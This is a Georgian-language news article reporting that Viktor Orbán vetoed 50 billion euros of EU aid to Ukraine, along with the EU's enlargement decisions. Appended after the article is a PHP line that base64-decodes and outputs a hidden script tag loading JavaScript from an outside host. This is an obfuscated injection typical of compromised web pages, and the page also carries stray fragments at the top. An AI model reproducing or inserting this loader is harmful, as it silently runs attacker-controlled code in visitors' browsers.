celsiusi
ავერსი შნაიდერი

 უნგრეთის პრემიერ-მინისტრმა ვიქტორ ორბანმა ევროკავშირის მიერ უკრაინისთვის 50 მილიარდი ევროს დახმარების გამოყოფა დაბლოკა. ამის შესახებ თავად ორბანმა სოციალურ ქსელ X-ში დაწერა.

ორბანი წერს, რომ „უკრაინისთვის დამატებით ფულს ვეტო დაადო". „საკითხს მომავალ წელს #EUCO-ში სათანადო მომზადების შემდეგ დავუბრუნდებით“, - წერს უნგრეთის პრემიერ-მინისტრი.

შეგახსენებთ, რომ უკრაინასთან მოლაპარაკებების გახსნის წინააღმდეგი იყო უნგრეთის პრემიერი ვიქტორ ორბანი, რომელმაც საკითხის განხილვისას დარბაზი დატოვა, თუმცა ვეტოს ძალა არ გამოიყენა.

ფინანსური პაკეტის განხილვამდე ევროკავშირის წევრი ქვეყნების ლიდერებმა მხარი დაუჭირეს ევროკავშირის გაფართოებას, მათ შორის უკრაინასა და მოლდოვასთან წევრობაზე მოლაპარაკებების გახსნას და საქართველოსთვის კანდიდატის სტატუსის მინიჭებას. ასევე ევროკავშირი დაიწყებს მოლაპარაკებებს ბოსნია-ჰერცეგოვინასთან, მას შემდეგ რაც მიაღწევს წევრობის კრიტერიუმებთან შესაბამისობის აუცილებელ ხარისხს.

271
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");